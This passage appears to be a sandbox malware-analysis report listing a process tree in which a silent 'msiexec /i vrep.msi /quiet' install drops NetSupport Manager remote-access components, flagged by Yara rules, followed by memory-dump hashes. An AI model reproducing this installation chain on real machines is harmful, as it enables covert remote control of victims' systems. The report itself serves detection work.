                                                                                        Imagebase:0xaf0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xd60000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xac0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xeb0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x200000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xa20000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xc40000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:20:53:52
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
                                                                                        Imagebase:0x6c0000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:20
                                                                                        Start time:20:53:53
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                        Imagebase:0x7ff728190000
                                                                                        File size:69'632 bytes
                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:21
                                                                                        Start time:20:53:55
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F1F5193EAAA26C6686643ED3090C1E98
                                                                                        Imagebase:0x6c0000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:22
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                        Imagebase:0x7ff71cca0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:23
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7c7080000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:24
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\attrib.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                        Imagebase:0x700000
                                                                                        File size:19'456 bytes
                                                                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:25
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSIF373.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSIF373.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                        Imagebase:0x590000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF373.tmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:26
                                                                                        Start time:20:53:59
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6A6FD5B6F4DA3E504B51BAF4C9444B82 E Global\MSI0000
                                                                                        Imagebase:0x6c0000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:27
                                                                                        Start time:20:54:00
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSIF985.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                        Imagebase:0x8d0000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF985.tmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:28
                                                                                        Start time:20:54:06
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                                                                        Imagebase:0x750000
                                                                                        File size:551'904 bytes
                                                                                        MD5 hash:FE7D9DC26FF1615C13722E0F2DD3B815
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.114215734060.00000000007BB000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.114214596852.00000000007BB000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:29
                                                                                        Start time:20:54:06
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSI1387.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                                                                        Imagebase:0xfa0000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1387.tmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:30
                                                                                        Start time:20:54:07
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:winst64.exe /q /q /ex /i
                                                                                        Imagebase:0x7ff679350000
                                                                                        File size:345'056 bytes
                                                                                        MD5 hash:96E987D909600D34DD70C55F56EB8869
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:31
                                                                                        Start time:20:54:11
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSI23E6.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                                                                        Imagebase:0xb50000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23E6.tmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:32
                                                                                        Start time:20:54:11
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                                                                                        Imagebase:0x1f0000
                                                                                        File size:120'288 bytes
                                                                                        MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 12%, ReversingLabs
                                                                                        Has exited:false

                                                                                        Target ID:33
                                                                                        Start time:20:54:12
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                                                                        Imagebase:0x1f0000
                                                                                        File size:120'288 bytes
                                                                                        MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.115175806998.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.115176197402.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000000.114272266016.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.115188311380.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        Target ID:34
                                                                                        Start time:20:54:12
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
                                                                                        Imagebase:0xdf0000
                                                                                        File size:120'288 bytes
                                                                                        MD5 hash:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000002.114281184741.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000002.114281372706.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000000.114273328544.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:35
                                                                                        Start time:20:54:12
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                                                                        Imagebase:0xdf0000
                                                                                        File size:120'288 bytes
                                                                                        MD5 hash:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000002.114274483585.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000000.114273968931.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:36
                                                                                        Start time:20:54:13
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
                                                                                        Imagebase:0x7ff7c86a0000
                                                                                        File size:57'360 bytes
                                                                                        MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:38
                                                                                        Start time:20:54:14
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\cscript.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49749
                                                                                        Imagebase:0x6a0000
                                                                                        File size:144'896 bytes
                                                                                        MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:39
                                                                                        Start time:20:54:14
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7c7080000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                          • Opcode Fuzzy Hash: 63ba86c8d62bd2d2acc537e23bd5a22cfe6faea422ed7cd2f51c84af3362ecb8
                                                                                          • Instruction Fuzzy Hash: 9042F8B5B0420ACFCB28DF64D4106AABBF2BFC6290F1484AAD455DB256DB31DD43CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113958417111.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_77d0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fdb1abefc029a2cc18b56e93aafff77f33880e567a0eb5b0e8ca579424943a69
                                                                                          • Instruction ID: 22d0248072c5e2434f4608538829afe70a437a768770a1e4406077ed114d6efc
                                                                                          • Opcode Fuzzy Hash: fdb1abefc029a2cc18b56e93aafff77f33880e567a0eb5b0e8ca579424943a69
                                                                                          • Instruction Fuzzy Hash: 854226B4E14259DFDF14DFA4D498AADBBB2FF89344F108429D9126B294C7346C82CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113958417111.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_77d0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ee079e9713bef0332ba2eb79bd8f946a0a350e9a858e2747c93116b1a3f4f45c
                                                                                          • Instruction ID: 35f66a8b457d00397e3329c2fd7012d4e0b9e25ed84d3c9296b573ae81bb7325
                                                                                          • Opcode Fuzzy Hash: ee079e9713bef0332ba2eb79bd8f946a0a350e9a858e2747c93116b1a3f4f45c
                                                                                          • Instruction Fuzzy Hash: F70236B5B05345CFDB299B799800BAABBB1EFC6294F14846BC845DF241EB71CC41CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113958417111.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_77d0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab7bb3fb8f2b86ab58f753a29f876efccb05724807085926aa3703b69e3a074f
                                                                                          • Instruction ID: c6e569f53ae332408432276f9b70babe1fb126711e4cd29e00a9e30273de5b92
                                                                                          • Opcode Fuzzy Hash: ab7bb3fb8f2b86ab58f753a29f876efccb05724807085926aa3703b69e3a074f
                                                                                          • Instruction Fuzzy Hash: 81D138B1B0424ACFDB19DB74D8107AABBF2BFCA290F5584AAD545CB251DB31CC42CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113958417111.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_77d0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 539e59a4b83645a748ccd9487f1561b464ebe26b527194c06709f7ab88add695
                                                                                          • Instruction ID: 26fc53cca5da5e448445e1d62318c36caed6c33799ea6905715e933f0c777f7b
                                                                                          • Opcode Fuzzy Hash: 539e59a4b83645a748ccd9487f1561b464ebe26b527194c06709f7ab88add695
                                                                                          • Instruction Fuzzy Hash: E0F1E3B4E15208EFDB28DFA4E5986ACBBB2FF49315F208429E416A7354CB356D81CF41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113958417111.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_77d0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1f8e82fc968248cdfcd315a00dfcb65693e20594aad6582c1e12a0b776d98a82
                                                                                          • Instruction ID: 56f81397e600fad0b4c15467ad1001d18244eef4680a102922e865e5ed26bfe0
                                                                                          • Opcode Fuzzy Hash: 1f8e82fc968248cdfcd315a00dfcb65693e20594aad6582c1e12a0b776d98a82
                                                                                          • Instruction Fuzzy Hash: 76915BB570434A8FDB29AB34D8507AA7BB1EF86290F2488BBC445CB252DB35CC45C7A1
                                                                                          Memory Dump Source
